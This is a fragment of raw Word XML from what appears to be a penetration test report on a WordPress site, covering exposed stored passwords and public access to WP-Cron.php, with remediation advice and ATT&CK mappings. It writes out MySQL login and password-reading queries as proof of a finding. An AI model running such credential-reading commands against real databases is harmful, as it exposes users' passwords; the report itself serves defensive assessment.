          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1C5E2AF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the exposure of</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1273ACAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sensitive</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1273ACAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> information and potential operational disruptions</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3908BA10">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> depending on the privileges of the compromised user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60439950">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265B6CFE" w14:textId="4C29B5A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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="1776F915" w14:textId="64DB40E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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="60DAEDDC" w14:textId="35A77F1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Login to the database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="18D03398" w14:textId="1BFB9E29">
      <w:pPr>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Code block here </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mysql</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–u admin –p</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39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="77F7DADE" w14:textId="666DF3A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Step 2: Access the database </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="3FB2DE59" w14:textId="2A4A0BFE">
      <w:pPr>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Code block here </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use</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wp-database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="242EDBD3" w14:textId="15E5AD6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Step 3: View the stored passwords </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="2968E70D" w14:textId="7F785F99">
      <w:pPr>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Code block here </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SELECT</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 Passwords FROM </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User_Data</w:t>
      </w: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51462E95" w14:textId="330CCF8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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="5E038702" w14:textId="1915CE7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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="7401F7A2" w14:textId="6442801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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="7463D1DA" w14:textId="76C764F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>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 xml:space="preserve">Stored passwords should be encrypted using a strong </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5BD57DB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encryption/</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39AB4EA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hash method that is hard to brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5108B353" w:rsidP="0D325B6E" w:rsidRDefault="5108B353" w14:paraId="4A111191" w14:textId="7290914F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>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Hashes should be salted an</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d pepper</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v</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he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attacker</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be</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ing</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b</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le t</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crack</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has</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AAED114">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 xml:space="preserve">offline through brute </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forc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5108B353">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="78FA0042" w14:textId="478C66BA">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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="524774BD" w14:textId="3A8FB29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AB4EA9">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39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="54B5652C" w14:textId="72178DE6">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Ra2a83d02f22046c8">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="39AB4EA9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Password Storage Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="6C0C10A8" w:rsidP="0D325B6E" w:rsidRDefault="6C0C10A8" w14:paraId="09F33E1B" w14:textId="5F6A191D">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338ff623b10741d6">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6C0C10A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Netsec - Password Salting and Peppering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C0C10A8">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073A786C" w14:textId="6FF30D21">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5C7B8618" w14:textId="77287587">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="64E2B999" w14:textId="7520D423">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3566F6F7" w14:textId="2018C19C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5E925D51" w14:textId="5F36BA3C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="71BAA671" w14:textId="3F79C690">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="26242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="18DF25E6" w14:textId="28908BF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26242CD2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="26242CD2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1: P</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F25B0CE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ublic Access to WP-Cron.php</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20D0533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47AE7D8" w14:textId="1F45F7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E67BBFD" w14:textId="6D440D3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81C0A3C" w14:textId="6A0AC6F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7A7A3D5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ED36E8" w14:textId="5D5090B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F2A8A10" w14:textId="1403B22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44A59710" w14:textId="12490CE0">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6.8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6165B60" w14:textId="5CB44D98">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260DCF7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D3A6A5" w14:textId="20278D5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EC5AE8F" w14:textId="70CCF7AC">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B11AB54"/>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E3D7926"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="01FDF79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A7F174" w14:textId="67940CD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4ACB416" w14:textId="650A1F66">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R1b5e3386d27e4d67">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L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VA:N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SC:N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3071D256">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AF7E58A" w14:textId="387F5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49BD99" w14:textId="4F24597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AD2E6E8" w:rsidP="0D325B6E" w:rsidRDefault="0AD2E6E8" w14:paraId="4B5D778E" w14:textId="017F2A3B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rca94cfbc56f14ae6">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0AD2E6E8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7218EA4E">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24EADF6"/>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1F23EA" w14:textId="1D6D1C5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604952D" w:rsidP="0D325B6E" w:rsidRDefault="7604952D" w14:paraId="63049D94" w14:textId="6FEE398D">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f09267a6b1f448ea">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7604952D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1054: Software Configuration</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="7604952D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="5739F6F8" w:rsidP="0D325B6E" w:rsidRDefault="5739F6F8" w14:paraId="7F964D27" w14:textId="7C91EAD3">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4cadabd3618c4378">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5739F6F8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1042: Disable or Remove Feature or Program</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="46E7552B">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2C20C62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5783A8" w14:textId="2BEB1093">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E596122" w14:textId="563C0AAB">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RDefault="0D325B6E" w14:paraId="60C4E6EE" w14:textId="1F3306BC"/>
    <w:p w:rsidR="26242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="6841C9E6" w14:textId="1C24E41C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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79583AF" w:rsidP="0D325B6E" w:rsidRDefault="179583AF" w14:paraId="74E6DE23" w14:textId="2387C79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79583AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An attacker can exploit th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D44E918">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e WP-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7D44E918">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cron.php</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="179583AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71B6FE65">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is used to schedule and run background tasks on WordPress,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="179583AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by repe</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F9F51D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>atedly</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="179583A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 xml:space="preserve">hammering it with requests </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in an attempt to</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 xml:space="preserve"> cause a</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Denial of</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D68880C">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(DOS) attack. Successful exploitation impacts</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="475EE2B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75EE2B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the availability of the WordPress website for all users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1DC4F626" w14:textId="4AC2F46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6242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="69823D8B" w14:textId="2C36BF1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D907E04" w:rsidP="0D325B6E" w:rsidRDefault="5D907E04" w14:paraId="58ADB719" w14:textId="566FE810">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This will cause server performance to b</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e </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mpact</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ed</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and could cause the website to become unavailable due to a high </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77AD20D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>number</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 of resources be</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ing us</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ed by the attacker</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mpacti</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ng</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D907E04">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the availability of the WordPress server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="020E3A6B" w14:textId="324D45E4">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6242CD2" w:rsidP="0D325B6E" w:rsidRDefault="26242CD2" w14:paraId="6A38FDF0" w14:textId="59FFFAA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8C77B0F" w:rsidP="0D325B6E" w:rsidRDefault="08C77B0F" w14:paraId="26AD8899" w14:textId="1ACFCC5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C77B0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As this penetration test was run against the live production environment, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="08C77B0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8C77B0F">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9B21D58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>did NOT run any exploits</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16AFA6CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tha</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="16AFA6CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
